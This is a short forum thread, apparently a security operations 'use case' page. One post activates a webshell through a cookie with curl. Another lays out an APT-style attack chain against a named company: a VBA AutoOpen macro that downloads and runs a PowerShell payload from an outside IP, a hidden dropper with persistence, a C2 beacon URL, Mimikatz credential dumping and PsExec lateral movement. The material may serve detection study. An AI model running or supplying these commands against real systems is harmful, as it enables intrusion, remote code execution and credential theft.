Announcement

Collapse
No announcement yet.

SOC Usecase

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    SOC Usecase

    Activate WebShell Via special cookie

    PHP Code:
    curl ---cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami 
    Tags: None
  • #2
    APT-1 attacks on Westinghouse Electric Company

    initial access
    - phishing
    - word with VBA , Macro Enabled

    HTML Code:
    Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub

    Dropper : C:\Users\Public\chrome_upd.exe

    [ Persist ]
    Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

    POST request every 30s to http://updater[.]info/report.php

    [ Lateral Movement ]
    PsExec + Mimikatz

    HTML Code:
    .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
[HTML]
    psexec.exe \\TARGET -u admin -p password cmd.exe[/HTML]

    [ Data Gathering and Exfiltration ]

    powershell + RAR

    Comment

    • #3
      Auditd and Log Forwarders Status

      coming soon .....

      Comment

      Previous template Next
      Working...
      X